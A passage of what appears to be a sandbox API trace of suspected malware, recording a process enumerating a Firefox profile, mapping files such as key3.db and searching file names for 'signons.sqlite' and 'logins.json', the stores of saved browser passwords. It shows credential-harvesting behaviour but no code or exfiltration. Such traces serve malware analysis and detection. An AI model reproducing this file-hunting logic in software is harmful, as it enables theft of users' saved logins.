out: lpFindFileData=0x52d5e8) returned 0x5b9b10 [0589.508] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.508] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.508] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.508] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.508] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.508] lstrlenW (lpString="\\") returned 1 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5a2988 [0589.508] lstrlenW (lpString=".metadata") returned 9 [0589.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5a2ae8 [0589.508] LocalFree (hMem=0x5a2988) returned 0x0 [0589.508] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.508] CloseHandle (hObject=0x4e0) returned 1 [0589.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0589.508] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5f02b0 [0589.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x5f02b0, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0589.508] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.508] CloseHandle (hObject=0x4e0) returned 1 [0589.509] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.509] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.509] CreateFileMappingW (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.509] CloseHandle (hObject=0x4e0) returned 1 [0589.509] LocalFree (hMem=0x5f02b0) returned 0x0 [0589.509] StrStrIW (lpFirst=".metadata", lpSrch="signons.sqlite") returned 0x0 [0589.509] StrStrIW (lpFirst=".metadata", lpSrch="logins.json") returned 0x0 [0589.509] LocalFree (hMem=0x5a2ae8) returned 0x0 [0589.509] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.509] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0589.509] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.509] lstrlenW (lpString="\\") returned 1 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5a2988 [0589.509] lstrlenW (lpString="idb") returned 3 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x5a2ae8 [0589.509] LocalFree (hMem=0x5a2988) returned 0x0 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.509] lstrlenW (lpString="\\*.*") returned 4 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x5f02b0 [0589.509] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d370 | out: lpFindFileData=0x52d370) returned 0x5b9bd0 [0589.509] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.509] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d370 | out: lpFindFileData=0x52d370) returned 1 [0589.509] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.509] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.509] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d370 | out: lpFindFileData=0x52d370) returned 1 [0589.509] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0589.509] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.509] lstrlenW (lpString="\\") returned 1 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5f0420 [0589.509] lstrlenW (lpString="818200132aebmoouht") returned 18 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x5f0588 [0589.509] LocalFree (hMem=0x5f0420) returned 0x0 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.509] lstrlenW (lpString="\\*.*") returned 4 [0589.509] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.509] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x5f0718 [0589.509] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d0f8 | out: lpFindFileData=0x52d0f8) returned 0x5b9b90 [0589.510] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.510] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d0f8 | out: lpFindFileData=0x52d0f8) returned 1 [0589.510] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.510] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.510] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d0f8 | out: lpFindFileData=0x52d0f8) returned 0 [0589.510] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0589.510] LocalFree (hMem=0x5f0718) returned 0x0 [0589.510] LocalFree (hMem=0x5f0588) returned 0x0 [0589.510] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d370 | out: lpFindFileData=0x52d370) returned 1 [0589.510] lstrlenW (lpString="\\") returned 1 [0589.510] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.510] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5f0420 [0589.510] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0589.510] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.510] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f0588 [0589.510] LocalFree (hMem=0x5f0420) returned 0x0 [0589.510] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0589.510] CloseHandle (hObject=0x670) returned 1 [0589.510] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0589.510] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f0720 [0589.510] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x5f0720, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0589.510] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0589.510] CloseHandle (hObject=0x670) returned 1 [0589.510] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0589.510] GetFileSize (in: hFile=0x670, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0589.510] CreateFileMappingW (hFile=0x670, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4dc [0589.510] MapViewOfFile (hFileMappingObject=0x4dc, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.520] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.533] CloseHandle (hObject=0x4dc) returned 1 [0589.533] CloseHandle (hObject=0x670) returned 1 [0589.533] LocalFree (hMem=0x5f0720) returned 0x0 [0589.533] LocalFree (hMem=0x5f0588) returned 0x0 [0589.533] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d370 | out: lpFindFileData=0x52d370) returned 0 [0589.533] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0589.533] LocalFree (hMem=0x5f02b0) returned 0x0 [0589.533] LocalFree (hMem=0x5a2ae8) returned 0x0 [0589.533] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0 [0589.533] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.533] LocalFree (hMem=0x578c30) returned 0x0 [0589.533] LocalFree (hMem=0x5e1e48) returned 0x0 [0589.533] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0 [0589.533] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.533] LocalFree (hMem=0x56afc8) returned 0x0 [0589.533] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.533] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.533] lstrlenW (lpString="\\") returned 1 [0589.533] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.533] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.533] lstrlenW (lpString="key3.db") returned 7 [0589.533] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.533] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5e1d10 [0589.533] LocalFree (hMem=0x578c30) returned 0x0 [0589.533] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.533] CloseHandle (hObject=0x668) returned 1 [0589.533] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0589.533] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x578c30 [0589.533] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x578c30, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0589.533] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.533] CloseHandle (hObject=0x668) returned 1 [0589.533] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.533] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0589.533] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.534] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.534] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.534] CloseHandle (hObject=0x66c) returned 1 [0589.534] CloseHandle (hObject=0x668) returned 1 [0589.534] LocalFree (hMem=0x578c30) returned 0x0 [0589.534] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.534] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.534] lstrlenW (lpString="\\") returned 1 [0589.534] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.534] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.534] lstrlenW (lpString="localstore.rdf") returned 14 [0589.534] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.534] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.534] LocalFree (hMem=0x578c30) returned 0x0 [0589.534] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.534] CloseHandle (hObject=0x668) returned 1 [0589.534] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.534] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.534] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0589.534] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.535] CloseHandle (hObject=0x668) returned 1 [0589.535] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.535] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0589.535] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.535] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.535] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.535] CloseHandle (hObject=0x66c) returned 1 [0589.535] CloseHandle (hObject=0x668) returned 1 [0589.535] LocalFree (hMem=0x56c300) returned 0x0 [0589.535] LocalFree (hMem=0x56afc8) returned 0x0 [0589.535] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.535] lstrlenW (lpString="\\") returned 1 [0589.535] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.535] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.535] lstrlenW (lpString="marionette.log") returned 14 [0589.535] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.535] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.535] LocalFree (hMem=0x578c30) returned 0x0 [0589.535] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.535] CloseHandle (hObject=0x668) returned 1 [0589.536] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.536] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.536] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0589.536] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.536] CloseHandle (hObject=0x668) returned 1 [0589.536] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.536] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0589.536] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.536] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.536] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.536] CloseHandle (hObject=0x66c) returned 1 [0589.536] CloseHandle (hObject=0x668) returned 1 [0589.536] LocalFree (hMem=0x56c300) returned 0x0 [0589.536] LocalFree (hMem=0x56afc8) returned 0x0 [0589.536] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.536] lstrlenW (lpString="\\") returned 1 [0589.536] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.536] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.536] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0589.536] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.536] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.536] LocalFree (hMem=0x578c30) returned 0x0 [0589.536] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.537] CloseHandle (hObject=0x668) returned 1 [0589.537] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.537] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.537] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0589.537] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.537] CloseHandle (hObject=0x668) returned 1 [0589.537] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), 